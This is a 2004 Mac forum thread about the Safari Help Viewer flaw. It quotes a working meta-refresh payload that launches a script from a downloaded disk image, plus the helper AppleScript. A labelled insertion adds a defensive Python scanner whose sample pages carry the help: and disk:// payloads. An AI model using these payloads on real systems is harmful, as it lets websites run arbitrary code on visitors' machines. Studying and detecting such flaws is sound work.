New Safari exploit found.


HOM
2004-05-17, 13:30
Slashdot has a story up in the Apple section about a new exploit found that will allow Safari to run unauthorized programs. This (http://www.insecure.ws/article.php?story=2004051612423136) seems to be a description and demonstration of the problem.

I don't really know what this all means, but hopefully someone can point out why this is A Bad Thing.

Defiant
2004-05-17, 13:55
Have I told you that I love OmniWeb?

I just downloaded the exploit with OW, it mounted the disk-image, showed me the content of it and then nothing more happened. For those who are asking, the exploit app is right now a terminal script.

123
2004-05-17, 14:51
I don't really know what this all means, but hopefully someone can point out why this is A Bad Thing.
This means that any website can launch applications on your Mac.

In an HTML page:

HTTP-EQUIV="refresh" content="0; URL=help:runscript=MacHelp.help/Contents/Resources/English.lproj/shrd/OpnApp.scpt string='Volumes:0x04_script:0x04_script.term'"

simply means that Safari launches the helper (Help Viewer.app) which then launches "Volumes:0x04_script:0x04_script.term", which, in this case, is a file on a mounted disk image that you've previously downloaded. But you could also open any other launchable application or script.

Why is this bad? Because they can make you download just about any script they want and then execute it, for example a script that erases your home directory.

Defiant
2004-05-17, 15:13
That means that this exploit only works for Safari. For now.


This is the AppleScript that gets called:

on «event helphdhp» (completeParam)
	-- localizable text
	set cancelBtn to "Cancel"
	set errorText to "The item cannot be opened. It may be disabled or not installed."
	-- end localizable text

	try
		tell application "Finder"
			open file completeParam of the startup disk
		end tell

	on error errMsg number errNum
		display dialog errorText buttons {cancelBtn} default button 1 with icon 0
		return
	end try
end «event helphdhp»

alcimedes
2004-05-17, 15:37
This works (or is vulnerable) in Camino as well, at least the build I'm using.

curiousuburb
2004-05-18, 14:25
Discussion (http://discussions.info.apple.com/WebX?14@29.ytyhaR0Emal.1@.68936654/17) of fixes in Apple's Safari forums has pointed to this fix, which rewrites the helper app for Help Viewer to solve the problem for now:

http://www.isophonic.net/

The tool is at the top of the list... "Don't Go There GURLFriend"

The previously suggested fix of:
uncheck the "open safe files after d/l" in Safari prefs
will NOT protect you.

The new fix apparently does. (comes with a test button for before/after validation)

YMMV

JLL
2004-05-18, 14:53
Slashdot has a story up in the Apple section about a new exploit found that will allow Safari to run unauthorized programs. This (http://www.insecure.ws/article.php?story=2004051612423136) seems to be a description and demonstration of the problem.

I don't really know what this all means, but hopefully someone can point out why this is A Bad Thing.

Isn't this a Help Viewer flaw and not a Safari flaw?

curiousuburb
2004-05-18, 15:39
Safari unwittingly (perhaps not the right word) opens addresses that start with disk:// instead of http://,
so an unscrupulous website could build a meta-refresh to a .dmg which you'd blithely mount.
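As an added example that is not part of this thread (and not Apple's, Safari's or Unsanity's code), serving both 123's explanation of the help: meta-refresh above and curiousuburb's note about disk:// addresses: a small Python scanner that finds meta refresh tags in a page and flags any whose target is not a plain web URL. That is the defender's check implied by both posts: a refresh should only ever hand the browser an http or https address, so anything else (help:, disk:, or any other scheme routed to a helper application) is worth flagging at a proxy or in a page audit. The sample pages are constructed; the help: path mirrors the structure quoted in the thread, but the volume and script names are placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Schemes a browser may legitimately be sent to by a meta refresh. Anything
# else is passed to a protocol helper (Help Viewer, Disk Copy, ...), which is
# the path the thread is about, so it is reported rather than allowed.
ALLOWED_SCHEMES = {"http", "https"}


def parse_refresh_url(content):
    """Return the URL part of a refresh 'content' value, or None if there is none.

    Accepts the common shapes: "5", "0; url=...", "0;URL='...'", "0,url=...".
    A bare delay with no URL means "reload this page" and is not interesting.
    """
    parts = content.split(";", 1)
    if len(parts) < 2:
        parts = content.split(",", 1)
        if len(parts) < 2:
            return None
    rest = parts[1].strip()
    # "url=" is optional and case-insensitive in practice.
    m = re.match(r"url\s*=\s*", rest, re.I)
    if m:
        rest = rest[m.end():].strip()
    # Strip one layer of matching quotes around the address.
    if len(rest) >= 2 and rest[0] in "'\"" and rest[-1] == rest[0]:
        rest = rest[1:-1]
    return rest or None


class MetaRefreshScanner(HTMLParser):
    """Collects (scheme, url) for every meta refresh whose scheme is not allowed."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        # HTMLParser lowercases attribute names already; values may be None.
        attrs = {(k or "").lower(): (v or "") for k, v in attrs}
        if attrs.get("http-equiv", "").strip().lower() != "refresh":
            return
        url = parse_refresh_url(attrs.get("content", ""))
        if url is None:
            return
        scheme = urlsplit(url).scheme.lower()
        # Relative URLs have no scheme and stay on the same site; skip them.
        if scheme and scheme not in ALLOWED_SCHEMES:
            self.findings.append((scheme, url))


def scan_html(html):
    """Scan one HTML document and return the list of flagged (scheme, url) pairs."""
    scanner = MetaRefreshScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample pages (not captured from any real site).
SAMPLE_PAGES = {
    "benign": '<html><head><meta http-equiv="refresh" content="5; url=https://example.com/next"></head></html>',
    # Same shape as the help: refresh quoted in the thread; volume and script names are placeholders.
    "help_scheme": '<meta HTTP-EQUIV="refresh" content="0; URL=help:runscript=MacHelp.help/Contents/Resources/English.lproj/shrd/OpnApp.scpt string=\'Volumes:example_image:example.term\'">',
    # A refresh to a disk image via the disk:// scheme curiousuburb describes.
    "disk_scheme": "<META http-equiv='Refresh' content='0,url=\"disk://example.test/payload.dmg\"'>",
}


if __name__ == "__main__":
    for name, page in SAMPLE_PAGES.items():
        print(name, "->", scan_html(page) or "clean")
```

The scanner deliberately uses an allowlist rather than a list of known-bad schemes: the thread shows two helper-backed schemes being abused in the same week, and a denylist would have to be extended every time another one turned up. Note that this only catches the meta-refresh delivery route the posts describe; it does nothing about links the user clicks, which is why the real remedy is Apple's patch and the Help Viewer rewrite mentioned later in the thread.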

Crusader
2004-05-19, 17:28
That's pretty cool. It did freak me out when I first did it.

SonOfSylvanus
2004-05-19, 18:52
It's starting...

I've heard of more "vulnerabilities" and "exploits" in OSX and Mac apps recently than ever before. Is the Mac starting to lose its aura of invulnerability?

k squared
2004-05-20, 21:55
It's starting...

I've heard of more "vulnerabilities" and "exploits" in OSX and Mac apps recently than ever before. Is the Mac starting to lose its aura of invulnerability?

The Help Viewer flaw looks like it can turn out to be quite serious and I hope Apple responds quickly, but look at the bright side: after four years of OSX on the market, only two exploits have been developed and one of them (the Help Viewer one) exists at this moment as a proof of concept.

OSX is still extremely safe. Ports are turned by default. Passwords are needed to install software. Users are usually safe from other users' mischief. Root is off by default. Etc...

kretara
2004-05-21, 09:06
The real question here is why hasn't this flaw been patched yet!!!!
I've read in several places that Apple knew about this issue in mid Feb. Is Apple taking the M$ approach to patching now? Only patch when the flaw hits!

Come on Apple!


My boss had the balls to tell me yesterday that we shouldn't use Apples anymore because of how long it is taking Apple to patch this flaw (yes he was serious, he is bought and paid for by M$), to which I responded: How much has any security hole in an Apple OS cost us in the past 2 years? How about the same in any M$ OS in the same time period?
This shut him up pretty fast.

MacUsers
2004-05-21, 19:03
Patch available in software update.

Moogs
2004-05-22, 09:00
BE WARNED:

I installed the Apple Security Patch last night but am still NOT protected from a similar (same?) problem described by Unsanity. (http://www.unsanity.com/haxies/pa/whitepaper) The good news is, until Apple yanks their head out of their butt (how did they miss this one???), Unsanity has provided a free work-around called Paranoid Android. (http://www.unsanity.com/haxies/pa/)